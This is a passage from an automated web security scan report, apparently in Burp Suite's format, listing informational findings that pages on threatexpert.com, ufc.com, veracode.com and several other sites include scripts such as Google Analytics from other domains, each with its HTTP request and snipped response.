User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Content-Length: 21166
Content-Type: text/html
Last-Modified: Mon, 01 Mar 2010 15:06:56 GMT
Accept-Ranges: bytes
ETag: "245684d550b9ca1:992"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 04:05:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>msa.exe | Th
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.908. http://www.threatexpert.com/files/msxml71.dll.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/files/msxml71.dll.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /files/msxml71.dll.html HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Content-Length: 22309
Content-Type: text/html
Last-Modified: Mon, 01 Mar 2010 15:10:45 GMT
Accept-Ranges: bytes
ETag: "e4414f5e51b9ca1:992"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 04:05:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>msxml71.dll
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.909. http://www.threatexpert.com/filescan.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/filescan.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /filescan.aspx HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 04:06:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
ThreatExpert
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.910. http://www.threatexpert.com/introduction.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/introduction.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /introduction.aspx HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 04:05:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
ThreatExp
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.911. http://www.threatexpert.com/map.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/map.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /map.aspx HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 04:05:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
ThreatExp
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.912. http://www.threatexpert.com/memoryscanner.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/memoryscanner.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /memoryscanner.aspx HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 04:05:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>

...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.913. http://www.threatexpert.com/overview.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/overview.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /overview.aspx HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 04:06:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
ThreatExp
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.914. http://www.threatexpert.com/report.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/report.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

18.915. http://www.threatexpert.com/reports.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/reports.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /reports.aspx HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 19:29:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
ThreatExp
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.916. http://www.threatexpert.com/sescan.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/sescan.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /sescan.aspx HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 04:06:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>

...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.917. http://www.threatexpert.com/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/signin.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 04:05:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
ThreatExp
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.918. http://www.threatexpert.com/signup.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/signup.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

18.919. http://www.threatexpert.com/submissionapplet.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/submissionapplet.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /submissionapplet.aspx HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 04:05:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.920. http://www.threatexpert.com/submit.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/submit.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /submit.aspx HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 04:06:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.921. http://www.threatexpert.com/threats.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/threats.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /threats.aspx HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 19:30:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
ThreatExp
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.922. http://www.threatexpert.com/threats/adware-bho-gen.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/threats/adware-bho-gen.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /threats/adware-bho-gen.html HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Content-Length: 14119
Content-Type: text/html
Last-Modified: Mon, 01 Mar 2010 16:32:44 GMT
Accept-Ranges: bytes
ETag: "94430d25cb9ca1:992"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 19:30:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Adware.BHO.G
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.923. http://www.threatexpert.com/threats/trojan-fakealert.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/threats/trojan-fakealert.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /threats/trojan-fakealert.html HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Content-Length: 21033
Content-Type: text/html
Last-Modified: Mon, 01 Mar 2010 18:56:51 GMT
Accept-Ranges: bytes
ETag: "282112f470b9ca1:992"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 19:30:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Trojan.Fakea
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.924. http://www.trip.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trip.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET / HTTP/1.1
Host: www.trip.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.925. http://www.ufc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ufc.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js
http://cufon.shoqolate.com/js/cufon-yui.js
http://video.ufc.tv/ufc_system_assets_20110126/js/ITC_Franklin_Gothic.js
http://video.ufc.tv/ufc_system_assets_20110126/js/jquery.mainMenu.js
http://video.ufc.tv/ufc_system_assets_20110126/js/jquery.searchBox.js
http://video.ufc.tv/ufc_system_assets_20110126/js/jquery.shareThis.js
http://video.ufc.tv/ufc_system_assets_20110126/js/jquery.ufcButtons.js
http://video.ufc.tv/ufc_system_assets_20110126/js/jquery/jScrollPane-1.2.3.min.js
http://video.ufc.tv/ufc_system_assets_20110126/js/jquery/jquery.jcarousel.min.js
http://video.ufc.tv/ufc_system_assets_20110126/js/jquery/jquery.mousewheel.min.js
http://video.ufc.tv/ufc_system_assets_20110126/js/redirect.js
http://video.ufc.tv/ufc_system_assets_20110126/js/startup.js
http://video.ufc.tv/ufc_system_assets_20110126/js/yui/2.7.0/autocomplete/autocomplete-min.js
http://video.ufc.tv/ufc_system_assets_20110126/js/yui/2.7.0/connection/connection-min.js
http://video.ufc.tv/ufc_system_assets_20110126/js/yui/2.7.0/datasource/datasource-min.js
http://video.ufc.tv/ufc_system_assets_20110126/js/yui/2.7.0/yahoo-dom-event/yahoo-dom-event.js
http://video.ufc.tv/ufc_system_assets_20110126/plugins/grails-ui-1.1.1/js/grailsui/grailsui.js
http://w.sharethis.com/button/sharethis.js
http://www.google.com/jsapi

Request

GET / HTTP/1.1
Host: www.ufc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 03 Feb 2011 04:06:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 181040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengra
...[SNIP]...
<link rel="shortcut icon" href="http://video.ufc.tv/ufc_system_assets_20110126/images/favicon.ico" />
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://cufon.shoqolate.com/js/cufon-yui.js"></script>

   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110126/js/ITC_Franklin_Gothic.js"></script>

   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110126/js/jquery/jquery.jcarousel.min.js"></script>
   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110126/js/jquery.ufcButtons.js"></script>
   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110126/js/jquery.mainMenu.js"></script>
   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110126/js/jquery.searchBox.js"></script>
   <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110126/js/startup.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110126/js/jquery/jScrollPane-1.2.3.min.js"></script>
       <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110126/js/jquery/jquery.mousewheel.min.js"></script>
       <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110126/js/jquery.shareThis.js"></script>
       <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#&offsetLeft=-288&offsetTop=-4&publisher=8a80909b-bbba-4773-ad9c-57ff5f2349d5&type=website&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine&button=false"></script>

       <script type="text/javascript" src="http://www.google.com/jsapi"></script>
       <script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110126/js/redirect.js"></script>
...[SNIP]...
<link rel='stylesheet' type='text/css' href='http://video.ufc.tv/ufc_system_assets_20110126/plugins/grails-ui-1.1.1/js/grailsui/../../css/grailsui/grails-ui.css'/>
<script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110126/js/yui/2.7.0/yahoo-dom-event/yahoo-dom-event.js" ></script>
<script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110126/plugins/grails-ui-1.1.1/js/grailsui/grailsui.js" ></script>
<script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110126/js/yui/2.7.0/datasource/datasource-min.js" ></script>
<script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110126/js/yui/2.7.0/connection/connection-min.js" ></script>
<script type="text/javascript" src="http://video.ufc.tv/ufc_system_assets_20110126/js/yui/2.7.0/autocomplete/autocomplete-min.js" ></script>
...[SNIP]...

18.926. http://www.unitware.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.unitware.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.bluehost.com/src/js/dnr/CODE24/125x125/bh_125x125_04.gif
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A7uutgbcgpj4
http://www.hostmonster.com/src/js/dnreg/CODE21/120x120/1.gif
http://www.statcounter.com/counter/counter.js

Request

GET / HTTP/1.1
Host: www.unitware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:04:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A7uutgbcgpj4"></script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A7uutgbcgpj4"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<br><script type="text/javascript" src="http://www.hostmonster.com/src/js/dnreg/CODE21/120x120/1.gif"></script>
...[SNIP]...
<br><script type="text/javascript" src="http://www.bluehost.com/src/js/dnr/CODE24/125x125/bh_125x125_04.gif"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

18.927. http://www.veracode.com/security/xss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.veracode.com
Path:	/security/xss

Issue detail

The response dynamically includes the following scripts from other domains:

http://munchkin.marketo.net/munchkin.js
http://veracode.hubspot.com/salog.js.aspx
http://www.googleadservices.com/pagead/conversion.js
http://www.landingpg.com/lp-tracking/lp.js
https://lct.salesforce.com/sfga.js

Request

GET /security/xss HTTP/1.1
Host: www.veracode.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:06:43 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 04:06:43 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>XSS - Veracode</t
...[SNIP]...
<![endif]-->
<script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://veracode.hubspot.com/salog.js.aspx"> </script>
...[SNIP]...
</BODY> tag -->
<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.928. http://www.viper007bond.com/wordpress-plugins/vipers-video-quicktags/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.viper007bond.com
